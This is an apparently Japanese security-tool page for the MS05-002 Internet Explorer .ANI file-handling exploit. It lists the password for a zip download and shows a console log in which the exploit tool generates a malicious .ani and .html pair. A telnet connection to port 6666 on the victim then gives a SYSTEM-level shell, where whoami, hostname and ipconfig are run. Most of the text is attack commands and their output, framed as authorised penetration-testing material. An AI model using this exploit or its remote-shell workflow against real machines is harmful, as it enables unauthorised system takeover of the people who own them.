| files | password |
|---|---|
| ms05002.zip | pen-test |
C:\tool\exploit\win\ms05002>ms05002.exe ms05002 6666
(MS05-002) Microsoft Internet Explorer .ANI Files Handling Exploit
Copyright (c) 2004-2005 .: houseofdabus :.
Tested on all affected systems:
[+] Windows Server 2003
[+] Windows XP SP1, SP0
[+] Windows 2000 All SP
This is provided as proof-of-concept code only for educational purposes and test
ing by authorized individuals with permission to do so.
[*] Creating test.ani file ... Ok
[*] Creating test.html file ... Ok
telnet 192.168.0.150 6666
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>whoami
whoami
NT AUTHORITY\SYSTEM
C:\WINNT\system32>hostname
hostname
victim
C:\WINNT\system32>ipconfig
ipconfig
Windows 2000 IP Configuration
Ethernet adapter ローカル エリア接続:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 192.168.0.150
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.1.1
ターゲット上でHTMLよりANIファイルを呼び出し攻撃が成立するとターゲット上でコマンドプロンプトがオープンする。 このコマンドプロンプトを閉じるとシェルポートも閉じる。 また、攻撃元のtelnetをexitしても同様にシェルポートが閉じられる。